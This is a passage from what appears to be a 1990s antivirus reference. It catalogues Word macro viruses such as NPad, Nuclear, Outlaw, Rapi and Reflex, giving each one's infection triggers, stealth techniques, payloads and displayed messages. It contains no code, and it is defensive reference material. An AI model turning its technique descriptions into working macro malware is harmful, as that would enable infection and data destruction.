  23167. Size of macros: 1831 Bytes
  23168. Place of origin: Unknown
  23169. Date of origin: 1996
  23170. Destructive: No
  23171. Seen In-The-Wild: No
  23172. Description:
  23173.  
  23174. The only difference between this new variant and previous
  23175. NPad viruses is that NPad.O has some minor code
  23176. modifications and a corrupted payload.
  23177.  
  23178. As a result of the corruption, NPad.O only executes some of its
  23179. virus codes. Infection of the global template and further
  23180. documents still works, yet NPad.O never displays the scrolling
  23181. message from the original NPad.A virus.
  23182.  
  23183.  
  23184. [WORD_NPad.P]
  23185. Virus name: WORD_NPad.P
  23186. Virus Type: Word macro virus
  23187. Number of macros: 1
  23188. Encrypted: Yes
  23189. Macro names: AutoOpen
  23190. Size of macros: 1831 Bytes
  23191. Place of origin: Unknown
  23192. Date of origin: 1996
  23193. Destructive: No
  23194. Seen In-The-Wild: No
  23195. Description:
  23196.  
  23197. The only difference between this new variant and previous
  23198. NPad viruses is that NPad.P has some minor code
  23199. modifications and a corrupted payload.
  23200.  
  23201. As a result of the corruption, NPad.P only executes some of its
  23202. virus codes. Infection of the global template and further
  23203. documents still works, yet NPad.P never displays the scrolling
  23204. message from the original NPad.A virus.
  23205.  
  23206.  
  23207. [WORD_NPad.Q]
  23208. Virus name: WORD_NPad.Q
  23209. Virus Type: Word macro virus
  23210. Number of macros: 1
  23211. Encrypted: Yes
  23212. Macro names: AutoOpen
  23213. Size of macros: 1831 Bytes
  23214. Place of origin: Unknown
  23215. Date of origin: 1996
  23216. Destructive: No
  23217. Seen In-The-Wild: No
  23218. Description:
  23219.  
  23220. The only difference between this new variant and previous
  23221. NPad viruses is that NPad.Q has some minor code modifications and a
  23222. corrupted payload.
  23223.  
  23224. As a result of the corruption, NPad.Q only executes some of its
  23225. virus codes. Infection of the global template and further
  23226. documents still works, yet NPad.Q never displays the scrolling
  23227. message from the original NPad.A virus.
  23228.  
  23229.  
  23230. [WORD_NPad.R]
  23231. Virus name: WORD_NPad.R
  23232. Virus Type: Word macro virus
  23233. Number of macros: 1
  23234. Encrypted: Yes
  23235. Macro names: AutoOpen
  23236. Size of macros: 1831 Bytes
  23237. Place of origin: Unknown
  23238. Date of origin: 1996
  23239. Destructive: No
  23240. Seen In-The-Wild: No
  23241. Description:
  23242.  
  23243. The only difference between this new variant and previous
  23244. NPad viruses is that NPad.R has some minor code
  23245. modifications and a corrupted payload.
  23246.  
  23247. As a result of the corruption, NPad.Q only executes some of its
  23248. virus codes. Infection of the global template and further
  23249. documents still works, yet NPad.R never displays the scrolling
  23250. message from the original NPad.A virus.
  23251.  
  23252.  
  23253. [WORD_NPad.S]
  23254. Virus name: WORD_NPad.S
  23255. Virus Type: Word macro virus
  23256. Number of macros: 1
  23257. Encrypted: Yes
  23258. Macro names: AutoOpen
  23259. Size of macros: 1831 Bytes
  23260. Place of origin: Unknown
  23261. Date of origin: 1996
  23262. Destructive: No
  23263. Seen In-The-Wild: No
  23264. Description:
  23265.  
  23266. The only difference between this new variant and previous
  23267. NPad viruses is that NPad.S has some minor code modifications.
  23268.  
  23269. NPad.S modifies the "compatibility" section inside the WIN.INI
  23270. file. It adds a counter under the name of "NPAD328" and each
  23271. time the virus is activated, it increments this counter. Upon reaching
  23272. a value of 23 it resets the counter and displays the following
  23273. message in the status bar:
  23274.  
  23275. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  23276.  
  23277. It infects the global template when an infected document is
  23278. opened.  Further documents become infected when they are
  23279. also opened (AutoOpen).
  23280.  
  23281.  
  23282. [WORD_NPad.T]
  23283. Virus name: WORD_NPad.T
  23284. Virus Type: Word macro virus
  23285. Number of macros: 1
  23286. Encrypted: Yes
  23287. Macro names: AutoOpen
  23288. Size of macros: 1831 Bytes
  23289. Place of origin: Unknown
  23290. Date of origin: 1996
  23291. Destructive: No
  23292. Seen In-The-Wild: No
  23293. Description:
  23294.  
  23295. The only difference between this new variant and previous
  23296. NPad viruses is that NPad.T has some minor code
  23297. modifications and a corrupted payload.
  23298.  
  23299. As a result of the corruption, NPad.T only executes some of its
  23300. virus codes. Infection of the global template and further
  23301. documents still works, yet NPad.T never displays the scrolling
  23302. message from the original NPad.A virus.
  23303.  
  23304.  
  23305. [WORD_NPad.U]
  23306. Virus name: WORD_NPad.U
  23307. Virus Type: Word macro virus
  23308. Number of macros: 1
  23309. Encrypted: Yes
  23310. Macro names: AutoOpen
  23311. Size of macros: 1831 Bytes
  23312. Place of origin: Unknown
  23313. Date of origin: 1996
  23314. Destructive: No
  23315. Seen In-The-Wild: No
  23316. Description:
  23317.  
  23318. The only difference between this new variant and previous
  23319. NPad viruses is that NPad.U has some minor code modifications.
  23320.  
  23321. NPad.U modifies the "compatibility" section inside the WIN.INI
  23322. file. It adds a counter under the name of "NPAD328" and each
  23323. time the virus is activated, it adds 1 to the counter. Upon reaching
  23324. a value of 23 it resets the counter and displays the following
  23325. message in the status bar:
  23326.  
  23327. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  23328.  
  23329. It infects the global template when an infected document is
  23330. opened. Further documents become infected when they are
  23331. also opened (AutoOpen).
  23332.  
  23333.  
  23334. [WORD_NPad.V]
  23335. Virus name: WORD_NPad.V
  23336. Virus Type: Word macro virus
  23337. Number of macros: 1
  23338. Encrypted: Yes
  23339. Macro names: AutoOpen
  23340. Size of macros: 1831 Bytes
  23341. Place of origin: Unknown
  23342. Date of origin: 1996
  23343. Destructive: No
  23344. Seen In-The-Wild: No
  23345. Description:
  23346.  
  23347. The only difference between this new variant and previous
  23348. NPad viruses is that NPad.V has some minor code
  23349. modifications and a corrupted payload.
  23350.  
  23351. As a result of the corruption, NPad.V only executes some of its
  23352. virus codes. Infection of the global template and further
  23353. documents still works, yet NPad.V never displays the scrolling
  23354. message from the original NPad.A virus.
  23355.  
  23356.  
  23357. [WORD_NPad.W]
  23358. Virus name: WORD_NPad.W
  23359. Virus Type: Word macro virus
  23360. Number of macros: 1
  23361. Encrypted: Yes
  23362. Macro names: AutoOpen
  23363. Size of macros: 1831 Bytes
  23364. Place of origin: Unknown
  23365. Date of origin: 1996
  23366. Destructive: No
  23367. Seen In-The-Wild: No
  23368. Description:
  23369.  
  23370. The only difference between this new variant and previous
  23371. NPad viruses is that NPad.W has some minor code
  23372. modifications and a corrupted payload.
  23373.  
  23374. As a result of the corruption, NPad.W only executes some of its
  23375. virus codes. Infection of the global template and further
  23376. documents still works, yet NPad.W never displays the scrolling
  23377. message from the original NPad.A virus.
  23378.  
  23379.  
  23380. [WORD_NPad.X]
  23381. Virus name: WORD_NPad.X
  23382. Virus Type: Word macro virus
  23383. Number of macros: 1
  23384. Encrypted: Yes
  23385. Macro names: AutoOpen
  23386. Size of macros: 1831 Bytes
  23387. Place of origin: Unknown
  23388. Date of origin: 1996
  23389. Destructive: No
  23390. Seen In-The-Wild: No
  23391. Description:
  23392.  
  23393. The only difference between this new variant and previous
  23394. NPad viruses is that NPad.X has some minor code
  23395. modifications and a corrupted payload.
  23396.  
  23397. As a result of the corruption, NPad.X only executes some of its
  23398. virus codes. Infection of the global template and further
  23399. documents still works, yet NPad.X never displays the scrolling
  23400. message from the original NPad.A virus.
  23401.  
  23402.  
  23403. [WORD_NPad.Y]
  23404. Virus name: WORD_NPad.Y
  23405. Virus Type: Word macro virus
  23406. Number of macros: 1
  23407. Encrypted: Yes
  23408. Macro names: AutoOpen
  23409. Size of macros: 1831 Bytes
  23410. Place of origin: Unknown
  23411. Date of origin: 1996
  23412. Destructive: No
  23413. Seen In-The-Wild: No
  23414. Description:
  23415.  
  23416. The only difference between this new variant and previous
  23417. NPad viruses is that NPad.Y has some minor code
  23418. modifications and a corrupted payload.
  23419.  
  23420. As a result of the corruption, NPad.Y only executes some of its
  23421. virus codes. Infection of the global template and further
  23422. documents still works, yet NPad.Y never displays the scrolling
  23423. message from the original NPad.A virus.
  23424.  
  23425.  
  23426. [WORD_NPad.Z]
  23427. Virus name: WORD_NPad.Z
  23428. Virus Type: Word macro virus
  23429. Number of macros: 1
  23430. Encrypted: Yes
  23431. Macro names: AutoOpen
  23432. Size of macros: 1831 Bytes
  23433. Place of origin: Unknown
  23434. Date of origin: 1996
  23435. Destructive: No
  23436. Seen In-The-Wild: No
  23437. Description:
  23438.  
  23439. The only difference between this new variant and previous
  23440. NPad viruses is that NPad.Z has some minor code
  23441. modifications and a corrupted payload.
  23442.  
  23443. As a result of the corruption, NPad.Z only executes some of its
  23444. virus codes. Infection of the global template and further
  23445. documents still works, yet NPad.Z never displays the scrolling
  23446. message from the original NPad.A virus.
  23447.  
  23448.  
  23449. [WORD_Nuclear.A(a.k.a. Alert)]
  23450. Virus name: WORD_Nuclear.A (a.k.a. Alert)
  23451. Virus Type: Word macro virus
  23452. Number of macros: 9
  23453. Encrypted: Yes
  23454. Macro names: AutoExec, AutoOpen, DropSuriv, FileExit, FilePrint,
  23455.              FilePrintDefault, FileSaveAs, InsertPayload, Payload
  23456. Size of macros: 10556 Bytes
  23457. Place of origin: Australia
  23458. Date of origin: September 1995
  23459. Destructive: Yes
  23460. Common In-The-Wild: Yes
  23461. Description:
  23462.  
  23463. Nuclear was the second macro virus found "In-the-Wild" (after
  23464. Concept). It was distributed, over the Internet in a document
  23465. with information about the Concept virus. It was also the first
  23466. macro virus that uses Execute-Only (encrypted) macros to
  23467. make analysis more difficult.
  23468.  
  23469. Nuclear is activated with the "AutoExec" and "AutoOpen"
  23470. macros. Before it infects the global template (normal.dot), it
  23471. checks for a previous infection. It does not infect if it finds
  23472. the "AutoExec" macro.  Documents become infected when
  23473. they are saved with the "FileSaveAs" command.
  23474.  
  23475. After the virus macros have been transferred to the global
  23476. template,  Nuclear calls some destructive payloads. The first
  23477. payload tries to drop the "Ph33r" virus. Between 17:00 and
  23478. 17:59, Nuclear creates a text file including a script of the
  23479. DOS/Windows-EXE virus "Ph33r".  It then uses the DOS
  23480. command "DEBUG.EXE" to convert the file into an
  23481. executable file. It also creates the "EXEC_PH.BAT" batch file,
  23482. and calls it via a Dos shell. This last infection routine is faulty,
  23483. the DOS-window is closed immediately, and the "Ph33r" virus
  23484. never infects the system.
  23485.  
  23486. The second payload, upon printing a document, Nuclear
  23487. checks the system time and in case of a value larger than 55
  23488. in the seconds field, it adds the following text at the end of
  23489. the printed document:
  23490.  
  23491. "   And finally I would like to say:   "
  23492.  
  23493. "   STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC   "
  23494.  
  23495. The third destructive payload is activated on April 5, when
  23496. Nuclear deletes the system files "C:\IO.SYS", "C:\MSDOS.SYS" and
  23497. "C:\COMMAND.COM.
  23498.  
  23499. This leaves the computer unbootable.
  23500.  
  23501.  
  23502. [WORD_Nuclear.B]
  23503. Virus name: WORD_Nuclear.B
  23504. Virus Type: Word macro virus
  23505. Number of macros: 7
  23506. Encrypted: Yes
  23507. Macro names: AutoExec, AutoOpen, FilePrint, FilePrintDefault,
  23508.              FileSaveAs, InsertPayload, Payload
  23509. Size of macros: 3458 Bytes
  23510. Place of origin: France
  23511. Date of origin: March 1996
  23512. Destructive: Yes
  23513. Common In-The-Wild: Yes
  23514. Description:
  23515.  
  23516. The difference between this new variant and the Nuclear.A
  23517. virus is that Nuclear.B does not try to drop the "PH33r" virus.
  23518.  
  23519. For more information, please refer to the Nuclear.A description.
  23520.  
  23521. [WORD_Outlaw.A]
  23522. Virus name: WORD_Outlaw.A
  23523. Virus Type: Word macro virus
  23524. Number of macros: 3
  23525. Encrypted: No
  23526. Macro names: randomly selected
  23527. Size of macros: 21410 Bytes
  23528. Place of origin: Germany
  23529. Date of origin: September 1996
  23530. Payload: Yes
  23531. Common In-The-Wild: No
  23532. Description:
  23533.  
  23534. Outlaw has 3 unencrypted macros with a size of 21410 Bytes.
  23535.  
  23536. Each macro name consists of 5 characters made of: 2 letters (A-X)
  23537. corresponding to the hour field of the time and 4 randomly selected
  23538. numbers.
  23539.  
  23540. Outlaw redefines built-in macro commands. One macro is
  23541. associated with the letter " E " and another macro with the
  23542. "spacebar." Since both keys are very common, the probability
  23543. of an infection is very high. Outlaw is considered the first
  23544. (semi) polymorphic virus, since it changes its macro names.
  23545.  
  23546. Outlaw modifies the "Int1" section of Win.ini (Windows
  23547. directory). It puts the three random macro names under
  23548. Name=, Name1= and Name2=. This modification is used for
  23549. recognition of an already infected global template. Outlaw
  23550. does not infect the global template if the macro names,
  23551. mentioned in Win.ini (Name=xxxxxx), already exist.
  23552.  
  23553. It also modifies the following 3 document variables:
  23554.  
  23555. VirName
  23556. VirNameDoc
  23557. VirNamePayload
  23558.  
  23559. Outlaw.A does not infect a document if the value of the
  23560. VirNameDoc variable already exists in a document.
  23561.  
  23562. Upon infection of a document on January 20, Outlaw
  23563. launches its payload (works only under Windows 95).
  23564. It plays a laughing sound on the PC speaker and creates a
  23565. new document with the following text:
  23566.  
  23567. "   You are infected with   "
  23568.  
  23569. "   Outlaw   "
  23570.  
  23571. "   A virus from Nightmare Joker.   "
  23572.  
  23573.  
  23574. [WORD_Outlaw.B]
  23575. Virus name: WORD_Outlaw.B
  23576. Virus Type: Word macro virus
  23577. Number of macros: 3
  23578. Encrypted: Yes
  23579. Macro names: randomly selected
  23580. Size of macros: 21434 Bytes
  23581. Place of origin: Germany
  23582. Date of origin: September 1996
  23583. Payload: Yes
  23584. Common In-The-Wild: No
  23585. Description:
  23586.  
  23587. The difference between this new variant and the original
  23588. Outlaw.A virus is that Outlaw.B has three encrypted macros
  23589. while the macros in Outlaw.A are unencrypted.
  23590.  
  23591. For more information, please refer to the Outlaw.A description.
  23592.  
  23593.  
  23594. [WORD_Outlaw.C (a.k.a MoonRaider)]
  23595. Virus name: WORD_Outlaw.C (a.k.a MoonRaider)
  23596. Virus Type: Word macro virus
  23597. Number of macros: 5
  23598. Encrypted: Yes
  23599. Macro names: Random names
  23600. Size of macros: 14806 Bytes
  23601. Place of origin: Germany
  23602. Date of origin: November 1996
  23603. Payload: Yes
  23604. Seen In-The-Wild: No
  23605. Description:
  23606.  
  23607. Outlaw.C is a combination of the Outlaw.A and Magnum
  23608. viruses. It uses assigned keys to start up its macros. One of the
  23609. macros is associated with pressing SPACE, the other with
  23610. pressing "e."
  23611.  
  23612. ToolsMacro and ExtrasMakro are the two fixed virus macros.
  23613.  
  23614. Outlaw.C replaces "Tools/Macro" and "Extras/Makro" with its
  23615. own code in order to make recognition of an infected file
  23616. more difficult (called macro stealth technique).
  23617.  
  23618. The remaining 3 macro names are randomly chosen. Each
  23619. name consists of  characters: the first 2 letters correspond to
  23620. the hour field of the infection time and the next 4 characters
  23621. are randomly selected numbers.
  23622.  
  23623. Outlaw.C stores its macro names in the document variables:
  23624. VirName, VirNameDoc, and VirNamePayLoad.
  23625. For the global template it uses the [intl] section of win.ini to
  23626. store it macro names: Name1=, Name2=, and Name3=.
  23627.  
  23628. Upon pressing the "E" key on October 10th of each year a
  23629. document with the following text is created:
  23630.  
  23631. "   You are infected with the MooNRaiDer Virus!   "
  23632. "   Greetings to all members of Vlad!   "
  23633. "   I hope that's not the end!   "
  23634. "   The scene would be to boring without this very good group!   "
  23635. "   Nightmare Joker   "
  23636.  
  23637. On any other day of the year, Outlaw.C checks the
  23638. "Goodbye" setting in the "Vlad" section of win.ini. If it is not
  23639. "Yes" then a DOS based virus (written by the Australian virus
  23640. writing group VLAD) is dropped and an extra line is added to
  23641. C:\AUTOEXEC.BAT to execute the virus.
  23642.  
  23643. The hidden filename of the DOS-based virus is "goodbye.com."
  23644.  
  23645. [WORD_Oval.A]
  23646. Virus name: WORD_Oval.A
  23647. Virus Type: Word macro virus
  23648. Number of macros: 1
  23649. Encrypted: Yes
  23650. Macro names: AutoOpen
  23651. Size of macros: 339 Bytes
  23652. Place of origin: Texas, USA
  23653. Date of origin: April 1997
  23654. Payload: Yes
  23655. Seen In-The-Wild: Yes
  23656. Description:
  23657.  
  23658. Oval.A infects the global template (normal.dot) when an
  23659. infected document is opened. Further documents become
  23660. infected when they are also opened (AutoOpen).
  23661.  
  23662. When Oval triggers, it changes the font size (probability of 10
  23663. percent) of the active document. It also shows the following
  23664. message in the status bar:
  23665.  
  23666. "   Be sure to drink your Ovaltine   "
  23667.  
  23668.  
  23669. [WORD_Paper.A]
  23670. Virus name: WORD_Paper.A
  23671. Virus Type: Word macro virus
  23672. Number of macros: 5
  23673. Encrypted: No
  23674. Macro names: mswFS, FileClose, AutoOpen, ToolsMacro,
  23675.              AutoExec, FieSave, mswFC, mswAO
  23676. Size of macros: 3608 Bytes
  23677. Place of origin: Unknown
  23678. Date of origin: Unknown
  23679. Destructive: No
  23680. Seen In-The-Wild: No
  23681. Description:
  23682.  
  23683. When Paper infects a document, or the global template, it
  23684. copies all its virus macros and then renames them. If the
  23685. "AutoOpen" and "FileClose" macros already exist in the
  23686. global template, they are deleted.  In a similar fashion, the
  23687. "FileSave" macro is deleted from documents.
  23688.  
  23689. Paper replaces the Tools/Macro option with a dummy macro in
  23690. order to make recognition of an infected file more difficult
  23691. (called macro stealth technique). If a user selects the
  23692. Tools/Macro option nothing happens.
  23693.  
  23694.  
  23695. [WORD_PayCheck.A]
  23696. Virus name: WORD_PayCheck.A
  23697. Virus Type: Word macro virus
  23698. Number of macros: 7
  23699. Encrypted: Yes
  23700. Macro names: AutoExec, AutoOpen, FileOpen, FileSave
  23701.              FileSaveAs, ShellOpen, ToolsMacro
  23702. Size of macros: 8489 Bytes
  23703. Place of origin: Unknown
  23704. Date of origin: Spring 1997
  23705. Payload: Yes
  23706. Common In-The-Wild: Yes
  23707. Description:
  23708.  
  23709. Paycheck infects the global template (normal.dot) when an
  23710. infected document is opened. Further documents become
  23711. infected when they are saved.
  23712.  
  23713. It uses "ToolsMacro" to make recognition of an infected
  23714. document more difficult (called macro stealth technique).
  23715.  
  23716. It also checks the system time and in case of a 25, 26, 27, 28,
  23717. 29, 30 or 31 in the day field, it displays the following message:
  23718.  
  23719. "   Sekarang adalah tanghal 25, sudahkah anda mengabil gaji?   "
  23720. "   He..he..selamat. Kalau bisa, lebih keras lagi kerjany a.   "
  23721.                "   Bravo Bukit Asam!!!   "
  23722.  
  23723. When a user saves a document between the 20th and the 31st
  23724. of each month, Paycheck displays another message:
  23725.  
  23726. "   Internal error was occurred in module UNIDRV.DLL.   "
  23727. "   Your application may not be work normally.    "
  23728. "   Please contact Microsoft Product Support.   "
  23729.  
  23730.  
  23731. [WORD_Phantom.A (a.k.a Teaside, Guess, HiSexy)]
  23732. Virus name: WORD_Phantom.A (a.k.a Teaside, Guess, HiSexy)
  23733. Virus Type: Word macro virus
  23734. Number of macros: 1
  23735. Encrypted: No
  23736. Macro names: AutoOpen
  23737. Size of macros: 1126 Bytes
  23738. Place of origin: Germany
  23739. Date of origin: May 1996
  23740. Destructive: Yes
  23741. Common In-The-Wild: No
  23742. Description:
  23743.  
  23744. When an infected document is opened, Guess checks if the
  23745. document variables are set to "populated." If this is not the
  23746. case, a new global template (normal.dot) is created and the
  23747. virus macro "AutoOpen" is copied into the new document.
  23748. After that the variables are set to "populated" in order to mark
  23749. the file as "infected." If the variables are already set, the virus
  23750. infects the new document by transferring the "AutoOpen" macro using
  23751. the MakroCopy command. Guess is the first macro virus to use the
  23752. document variables as a checking mechanism for already infected
  23753. documents.
  23754.  
  23755. Because of an error inside the virus code, the virus does not
  23756. replicate properly.
  23757.  
  23758. Upon a random number (between 0 and 100), Guess activates
  23759. various destructive payloads. It changes the active font size or
  23760. creates a new document including the following text:
  23761.  
  23762. "   The word is out.   "
  23763. "   The word is spreading...   "
  23764. "   The Phantom speaks...   "
  23765. "   Sedbergh   "
  23766. "   is CRAP   "
  23767. "   The word spreads...   "
  23768.  
  23769. The text will then be printed out.
  23770.  
  23771. The following texts will be inserted into the active document
  23772. upon a calculated random number:
  23773.  
  23774. "   This school is really good.  NOT   "
  23775. "   We all love Mr. Hirst.   "
  23776. "   M.R.Beard   "
  23777. "   This network is REALLY fast.   "
  23778. "   Hi Sexy!   "
  23779. "   Who's been typing on my computer?   "
  23780. "   Well helloooo there!   "
  23781. "   Guess who?   "
  23782.  
  23783.  
  23784. [WORD_Phardera.A (a.k.a. Phandera)]
  23785. Virus name: WORD_Phardera.A (a.k.a. Phandera)
  23786. Virus Type: Word macro virus
  23787. Number of macros: 1
  23788. Encrypted: Yes
  23789. Macro names: FileOpen
  23790. Size of macros: 1673 Bytes
  23791. Place of origin: Batavia, Indonesia
  23792. Date of origin: July 1996
  23793. Destructive: Yes
  23794. Common In-The-Wild: No
  23795. Description:
  23796.  
  23797. Phardera activates when an infected document is opened
  23798. (FileOpen).
  23799.  
  23800. Phardera will not infect the global template or documents if
  23801. one of the following macros is already present:
  23802.  
  23803. "FileOpen"
  23804. "ToolsCustomizeMenus"
  23805. "ToolsOptionsSave"
  23806. "ToolsOptionsGeneral"
  23807.  
  23808. Phardera tries to hide its presence by removing Tools/Macro,
  23809. Tools/Customize and File/Templates from the options menu
  23810. (called macro stealth technique). This part of the virus works
  23811. only with the English version of Microsoft Word.
  23812.  
  23813. Upon infection of a document on the 13th of each month,
  23814. Phardera displays the following message:
  23815.  
  23816. "   Dianita DSR. [I Love Her!]   "
  23817.  
  23818. A second message is displayed when a document is infected
  23819. on the 31st of each month.
  23820.  
  23821. "   Phardera was here!   "
  23822.  
  23823.  
  23824. [WORD_Polite.A(a.k.a. WW2Demo)]
  23825. Virus name: WORD_Polite.A (a.k.a. WW2Demo)
  23826. Virus Type: Word macro virus
  23827. Number of macros: 2
  23828. Encrypted: No
  23829. Macro names: FileClose, FileSaveAs
  23830. Size of macros: 1918 Bytes
  23831. Place of origin: USA
  23832. Date of origin: March 1996
  23833. Destructive: No
  23834. Common In-The-Wild: No
  23835. Description:
  23836.  
  23837. Polite was first created with Microsoft version 2.0, yet it also
  23838. works with higher versions of Microsoft Word.
  23839.  
  23840. Polite can be called a demonstration virus and is very unlikely
  23841. to spread.  Before each infection attempt, it displays a
  23842. window with the following question:
  23843.  
  23844. "   Shall I infect the file ?   "
  23845.  
  23846. If the user answers with the "No" button, no document
  23847. gets infected.  While it asks for permission to infect files,
  23848. it does not ask for permission to infect the global template
  23849. (NORMAL.DOT).
  23850.  
  23851. Upon infection of the global template (when an infected
  23852. document is closed), Polite displays the following message:
  23853.  
  23854. "   I am alive!   "
  23855.  
  23856. Once Polite infects a Word 6.0/7.0 document it can not infect
  23857. Word 2.0 documents anymore.
  23858.  
  23859.  
  23860. [WORD_Random.A (Intended)]
  23861. Virus Type: Word macro virus
  23862. Virus name: WORD_Random.A (Intended)
  23863. Number of macros: 1 or more
  23864. Encrypted: No
  23865. Macro names: randomly chosen
  23866. Size of macros: 553 Bytes
  23867. Place of origin: Unknown
  23868. Date of origin: Spring 1997
  23869. Payload: No
  23870. Seen In-The-Wild: No
  23871. Description:
  23872.  
  23873. Random.A is another macro virus that does not infect
  23874. any other documents. Therefore, it is highly unlikely that
  23875. users will run into a document infected with this virus.
  23876.  
  23877.  
  23878. [WORD_Randomic.A]
  23879. Virus name: WORD_Randomic.A
  23880. Virus Type: Word macro virus
  23881. Number of macros: 1
  23882. Encrypted: No
  23883. Macro names: polymorphic
  23884. Size of macros: 2397 Bytes
  23885. Place of origin: Germany
  23886. Date of origin: Spring 1997
  23887. Payload: Yes
  23888. Seen In-The-Wild: No
  23889. Description:
  23890.  
  23891. Randomic infects the global template (normal.dot) when an
  23892. infected document is opened. Further documents become
  23893. infected when the user presses a randomly chosen key (which
  23894. is linked to the viral macro).
  23895.  
  23896. The two document variables that keep the name of the macro and
  23897. the key shortcuts are:
  23898.  
  23899. "   RANDOMIC   "
  23900. "   TKEY   "
  23901.  
  23902. Randomic also displays a message on April 4th and tries to exit
  23903. Windows.
  23904.  
  23905.  
  23906. [WORD_Rapi.A]
  23907. Virus name: WORD_Rapi.A
  23908. Virus Type: Word macro virus
  23909. Alias: WORD_Bacalah
  23910. Number of Variants: 46
  23911. Number of macros: 7 or 11 (global template)
  23912. Encrypted: No
  23913. Macro names: RpAe, RpFO, RpFS, RpTC, RpTM, RpFSA, AutoOpen
  23914. Size of macros: 6172 Bytes or 11228 Bytes
  23915. Place of origin: Indonesia
  23916. Date of origin: December 1996
  23917. Destructive: No
  23918. Common In-The-Wild: Yes
  23919. Description:
  23920.  
  23921. Rapi infects the global template when an infected document
  23922. is opened (AutoOpen). Further documents become infected
  23923. when they are opened (FileOpen) or saved (FileSave and
  23924. FileSaveAs).
  23925.  
  23926. Upon infection, Rapi displays the following message:
  23927.  
  23928. "   Thank's for joining us !   "
  23929.  
  23930. The "AutoExec" macro contains a destructive payload to
  23931. delete files, yet due to some REM's it never triggers.
  23932. However, Rapi.A drops a file (C:\BACALAH.TXT) to the root
  23933. directory.
  23934.  
  23935. The file contains the following Indonesian text:
  23936. (translated into English)
  23937.  
  23938. " Assalamualaikum..., sorry @Rapi.Kom disturbs you. This message "
  23939. " was originally called PESAN.TXT. It appears in the root directory "
  23940. " after running Word 6.0 and the global template (normal.dot) is "
  23941. " already infected by this macro. This macro virus (before the change "
  23942. " by Rapi@Kom) cam from a Word 6.0 file (*.doc) which was already "
  23943. " infected by this virus. When the file is opened (Open doc), the "
  23944. " macro automatically executes the instructions i.e. "
  23945. " copies itself to the global template (normal.dot). On a certain "
  23946. " date and time the macro will delete all files in the directory "
  23947. " levels 1, 2, and 3 (except for hidden directories........ "
  23948. " Malang (date and time of infection) @Rapi.Kom "
  23949.  
  23950. Rapi uses "ToolsMacro" and "ToolsCustomize" to make
  23951. recognition of an infected file more difficult (called macro
  23952. stealth technique). If a user selects one of the two options,
  23953. Word displays a WordBasic error message.
  23954.  
  23955. Rapi.A devolves into Rapi.A1 and Rapi.A2, which contain 6
  23956. or 3 macros (5607 Bytes or 3626 Bytes).
  23957.  
  23958.  
  23959.  
  23960. [WORD_Bacalah]
  23961. Virus name: WORD_Bacalah
  23962. Virus Type: Word macro virus
  23963. Alias: WORD_Rapi.A
  23964. Number of Variants: 46
  23965. Number of macros: 7 or 11 (global template)
  23966. Encrypted: No
  23967. Macro names: RpAe, RpFO, RpFS, RpTC, RpTM, RpFSA, AutoOpen
  23968. Size of macros: 6172 Bytes or 11228 Bytes
  23969. Place of origin: Indonesia
  23970. Date of origin: December 1996
  23971. Destructive: No
  23972. Common In-The-Wild: Yes
  23973. Description:
  23974.  
  23975. Bacalah infects the global template when an infected document
  23976. is opened (AutoOpen). Further documents become infected
  23977. when they are opened (FileOpen) or saved (FileSave and
  23978. FileSaveAs).
  23979.  
  23980. Upon infection, Bacalah displays the following message:
  23981.  
  23982. "   Thank's for joining us !   "
  23983.  
  23984. The "AutoExec" macro contains a destructive payload to
  23985. delete files, yet due to some REM's it never triggers.
  23986. However, Bacalah drops a file (C:\BACALAH.TXT) to the root
  23987. directory.
  23988.  
  23989. The file contains the following Indonesian text:
  23990. (translated into English)
  23991.  
  23992. " Assalamualaikum..., sorry @Rapi.Kom disturbs you. This message "
  23993. " was originally called PESAN.TXT. It appears in the root directory "
  23994. " after running Word 6.0 and the global template (normal.dot) is "
  23995. " already infected by this macro. This macro virus (before the change "
  23996. " by Rapi@Kom) cam from a Word 6.0 file (*.doc) which was already "
  23997. " infected by this virus. When the file is opened (Open doc), the "
  23998. " macro automatically executes the instructions i.e. "
  23999. " copies itself to the global template (normal.dot). On a certain "
  24000. " date and time the macro will delete all files in the directory "
  24001. " levels 1, 2, and 3 (except for hidden directories........ "
  24002. " Malang (date and time of infection) @Rapi.Kom "
  24003.  
  24004. Bacalah uses "ToolsMacro" and "ToolsCustomize" to make
  24005. recognition of an infected file more difficult (called macro
  24006. stealth technique). If a user selects one of the two options,
  24007. Word displays a WordBasic error message.
  24008.  
  24009.  
  24010. [WORD_Rapi.AA2]
  24011. Virus name: WORD_Rapi.AA2
  24012. Virus Type: Word macro virus
  24013. Number of macros: 3 or 5 (global template)
  24014. Encrypted: No
  24015. Macro names: RpAe, RpFS, AutoOpen
  24016. Size of macros: 4626 Bytes or 8571 Bytes (global template)
  24017. Place of origin: Unknown
  24018. Date of origin: Spring 1997
  24019. Destructive: No
  24020. Common In-The-Wild: Yes
  24021. Description:
  24022.  
  24023. Rapi.AA2 infects the global template when an infected
  24024. document is opened (AutoOpen). Further documents become
  24025. infected when they are saved (FileSave).
  24026. Rapi.AA was discovered in its last devolved form,
  24027. thus it was named Rapi.AA2.
  24028.  
  24029. The main difference between this virus and the previous Rapi viruses
  24030. is that the "RpAe" macro is corrupted.
  24031.  
  24032. Microsoft Word does not care about corrupted macros, therefore
  24033. Rapi.AA2 is still able to infect further documents.
  24034.  
  24035.  
  24036. [WORD_Reflex.A (a.k.a RedDwarf)]
  24037. Virus name: WORD_Reflex.A (a.k.a RedDwarf)
  24038. Virus Type: Word macro virus
  24039. Number of macros: 3 or 4
  24040. Encrypted: Yes
  24041. Macro names: AutoOpen, FClose, FileClose, FA
  24042. Size of macros: 897 Bytes in .doc files
  24043.                 1226 Bytes in global template
  24044. Place of origin: Ireland
  24045. Date of origin: Summer 1996
  24046. Destructive: No
  24047. Common In-The-Wild: No
  24048. Description:
  24049.  
  24050. An infected global template contains one more macro ("FA").
  24051. Upon infection, Reflex turns off the prompting of Word to
  24052. ensure a hidden infection of the global template (normal.dot).
  24053. Infected documents are saved with the password "Guardian."
  24054.  
  24055. Reflex was written at an anti-virus conference after an
  24056. anti-virus company announced a challenge to hackers to
  24057. break its new technology.  Any author of a new undetected
  24058. macro virus was supposed to receive champagne as a reward.
  24059.  
  24060. When Reflex infects a file it displays the following window:
  24061.  
  24062. "   Now, Where's that Jerbil of Bubbly?   "
  24063.  
  24064. [WORD_Sam.A:Tw]
  24065. Virus name: WORD_Sam.A:Tw
  24066. Virus Type: Word macro virus
  24067. Number of macros: 7 or 4
